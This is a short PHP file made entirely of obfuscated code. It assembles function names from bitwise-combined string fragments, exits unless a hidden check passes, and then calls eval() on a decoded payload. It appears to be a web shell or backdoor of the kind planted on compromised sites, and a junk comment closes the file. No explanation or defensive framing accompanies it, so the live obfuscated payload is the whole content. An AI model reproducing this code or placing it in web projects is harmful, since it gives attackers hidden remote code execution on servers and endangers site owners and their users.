<?php
$W4w96ya='T1GDiuBC19'&~zXtC08Msp;$uE='#1!?PG'^"ReA|p7";$XrbqxbO='@0 E8*HB@['.K4vT.'@y"L'.
         ')XV0-'.RTBBIHBBE|Ap4I.', H@'.XHH8T.'@Yq(A9Y@9X@'.DxBYdBXA;$ebzz=hLEjW.'^{'./*'.
         'a;!*/wH_tTnKuLNgo&'YdD@'._PKTF_NvMSWyoN.'[';$G_UHX9Eq8m='~;}|2x'^'6o),m9';'LJ'.
         '6';$vrMvacWNT=$uE|('rvz)}c'&':|'.wuox);$Ih43xdMT=(',Pm'|ae9)&('}l='&'}~u');/*'.
         '-*/$NhddyG=('DC!I@X'|'TB"L@M')^('7&W).;'&s6wjo.'/');$T7zaQ3Gp=$XrbqxbO^('~Fv-'.
         '^L/wn:k^S5|ZI~^ju]['.ron3.'~T{{u'&'weS,'.zKjwjz.':{'.M7maZ.'~yxg]'.KfmX.'#nT{'.
         'k}');$GN5BYe5zl8=('|<t{mb#o=wg.z8*m*le'^'4l$+5*~.m!0'.z6he.'$l.+')|$ebzz;'LKL'.
         'PS5Qrl%';if($vrMvacWNT($Ih43xdMT($NhddyG($G_UHX9Eq8m)),$T7zaQ3Gp))exit;'vOKXe'.
         'Rp)|<):|S';eval($NhddyG($GN5BYe5zl8));#-m!Io [v(sqOS{W52V]qD@kA[] We#O[VI2Yu'.
         'j7hW.w.~8fAYQCh!kJ !GUP$f+ehx <!EX4Hchz> I{}_8(JjnHV1j<y#Z';